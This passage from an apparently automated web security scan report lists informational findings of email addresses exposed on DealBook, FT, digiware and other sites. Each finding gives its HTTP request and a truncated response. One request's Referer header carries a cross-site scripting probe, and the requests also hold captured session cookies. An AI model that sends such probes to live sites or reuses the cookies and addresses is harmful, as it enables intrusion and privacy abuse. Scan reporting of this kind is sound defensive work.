adxcs=s*192f3=0:1|s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 61010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.14. http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/09/private-equity-has-a-horse-in-this-race/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/09/private-equity-has-a-horse-in-this-race/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 63016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.15. http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/10/apollo-to-buy-out-american-idol-owner/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/10/apollo-to-buy-out-american-idol-owner/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=gi367p67ehp7835r; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:2|s*1780a=0:1|s*2554b=0:1; nyt-m=3104B7CA0E858F5EE4588722866DC651&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200208493:ss=1305198204263; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.8.10.1305198192; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:36:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 62595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.16. http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=ABBCA6EE6FB956FC70EF4BEBA92D8B48&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.15.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199607199:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 59123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://g
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.17. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/mergers-acquisitions/

Issue detail

The following email address was disclosed in the response:

Request

GET /category/main-topics/mergers-acquisitions/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.18. http://dealbook.nytimes.com/category/main-topics/private-equity/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/private-equity/

Issue detail

The following email address was disclosed in the response:

Request

GET /category/main-topics/private-equity/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.6.10.1305198192; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200199902:ss=1305198204263

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:36:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 79475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.19. http://dealbook.nytimes.com/category/main-topics/venture-capital/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/venture-capital/

Issue detail

The following email address was disclosed in the response:

Request

GET /category/main-topics/venture-capital/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=FADD01C96E4F27CAA76E2D598CDA52BE&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199637269:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<a href="mailto:dealprof@nytimes.com">
...[SNIP]...

22.20. http://digiware.com/contact.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digiware.com
Path:   /contact.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.htm HTTP/1.1
Host: digiware.com
Proxy-Connection: keep-alive
Referer: http://digiware.com/privacy.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:00:47 GMT
Server: Apache/2.0.52 (Unix) PHP/5.2.9 DAV/2
Last-Modified: Sat, 11 Dec 2004 20:01:11 GMT
ETag: "17d1e-10ba-88634fc0"
Accept-Ranges: bytes
Content-Length: 4282
Content-Type: text/html; charset=ISO-8859-1

<html>

<head>
<title>Contact Us</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<style type="text/css">
<!--
.roll { font-family:Arial; font-size:10pt; font-style:normal; f
...[SNIP]...
<a class="rol" href="mailto:sales@digiware.com">sales@digiware.com</a>
...[SNIP]...

22.21. http://digiware.com/privacy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digiware.com
Path:   /privacy.htm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /privacy.htm HTTP/1.1
Host: digiware.com
Proxy-Connection: keep-alive
Referer: http://digiware.com/products.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:00:43 GMT
Server: Apache/2.0.52 (Unix) PHP/5.2.9 DAV/2
Last-Modified: Sat, 11 Dec 2004 20:01:39 GMT
ETag: "17d2c-16d3-8a0e8ec0"
Accept-Ranges: bytes
Content-Length: 5843
Content-Type: text/html; charset=ISO-8859-1

<html>

<head>
<title>Privacy Policy</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<style type="text/css">
<!--
.roll { font-family:Arial; font-size:10pt; font-style:norma
...[SNIP]...
<a href="mailto:info@diginet.net" <mailto:href>sales@dignet.net <mailto:info@diginet.net>
...[SNIP]...

22.22. http://honey.digiware.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://honey.digiware.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: honey.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://honey.digiware.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</strong> Danae Abigail Lizana Gonzales [mailto:danaeabiga@danaeabigail.com]<br />
...[SNIP]...

22.23. http://labs.csscorp.com/site/js/cform_popup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://labs.csscorp.com
Path:   /site/js/cform_popup.js

Issue detail

The following email address was disclosed in the response:

Request

GET /site/js/cform_popup.js HTTP/1.1
Host: labs.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://labs.csscorp.com/site/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:12:12 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 13:25:34 GMT
ETag: "3cb5dd-7a4-4a1fa7df5cf80"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 1956

.../***************************/
//@Author: Adrian "yEnS" Mato Gondelle
//@website: www.yensdesign.com
//@email: yensamg@gmail.com
//@license: Feel free to use it, but keep this credits please!                    
/***************************/

//SETTING UP OUR POPUP
//0 means disabled; 1 means enabled;
var popupStatus = 0;

//loading p
...[SNIP]...

22.24. http://maps.gstatic.com/cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.gstatic.com
Path:   /cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cat_js/intl/en_us/mapfiles/338b/maps2/%7Bmod_util,mod_strr,mod_adf,mod_act_s,mod_mssvt,mod_actbr,mod_appiw%7D.js HTTP/1.1
Host: maps.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://maps.google.com/maps?hl=en&source=hp&q=530+Virginia+Road+P.O.+Box+9133+Concord,+Massachusetts&ie=UTF8&hq=&hnear=530+Virginia+Rd,+Concord,+Middlesex,+Massachusetts+01742&z=14&iwloc=r10&ll=42.476402,-71.298008&output=embed

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Wed, 11 May 2011 01:41:09 GMT
Date: Thu, 12 May 2011 01:57:41 GMT
Expires: Fri, 11 May 2012 01:57:41 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 37836
Content-Length: 113403

__gjsload_maps2__('util', 'GAddMessages({});var nr=function(a,b){var c=1<<b+8;a.x=(a.x%c+c)%c;c=23-b;return new R(a.x<<c,a.y<<c)}, Vr=function(a){return a.Ta.Vu()}; function zl(a){this.ticks=a;this.ti
...[SNIP]...
100%;height:2em;line-height:2em;top:-.5em;overflow:hidden;position:absolute;left:0}', []);
__gjsload_maps2__('strr', 'GAddMessages({13828:"Sign in to use stars with",13829:"Sign in &raquo;",13830:"ex: pat@gmail.com",13831:"No account yet?",13832:"It\'s free and easy.",13833:"Create an account &raquo;",13338:"Seeing stars",13339:"When you star an item, it appears on your maps and is listed in My Maps.<br />
...[SNIP]...

22.25. http://media.ft.com/j/FTTrack2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.ft.com
Path:   /j/FTTrack2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/FTTrack2.js HTTP/1.1
Host: media.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUserTrack=173.193.214.243.1305198170970491; AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; GZIP=1; opFTData=%26v%3D1; opTrackSess=%26t%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 12 May 2011 21:05:28 GMT
Last-Modified: Fri, 04 Feb 2011 11:34:25 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
ETag: "737e-4d4be441"
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Content-Length: 29566


if(!document.cookie.match(/FTUserTrack=((\d{1,3}\.){3}\d{1,3})/))
{var call='<scr'+'ipt type="text/javascript" src="';call+=isSecure(document)?'https:':'http:';call+='//track.ft.com/track/';call+=isS
...[SNIP]...
</a> which allow you to: share links; copy content for personal use; &amp; redistribute limited extracts. Email ftsales.support@ft.com to buy additional rights or use this link to reference the article -","t":true};return Tynt;},doTynt:function(){if(typeof Tynt!="undefined"&&document.location.protocol=='http:'){var s=document.createE
...[SNIP]...

22.26. http://securelab.digiware.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://securelab.digiware.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: securelab.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:25:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://securelab.digiware.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 14395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
<p>Inicialmente llega al usuario un mensaje de correo asociado a Rent Car, haciendo referencia a una orden de compra la cual no se ha realizado. La fuente de correo es sales@dollarcar.org con el siguiente mensaje:</p>
...[SNIP]...

22.27. https://services.sungarddx.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /default.aspx?DN=244163,1,Documents&CommunityDN=161476,1,Documents HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
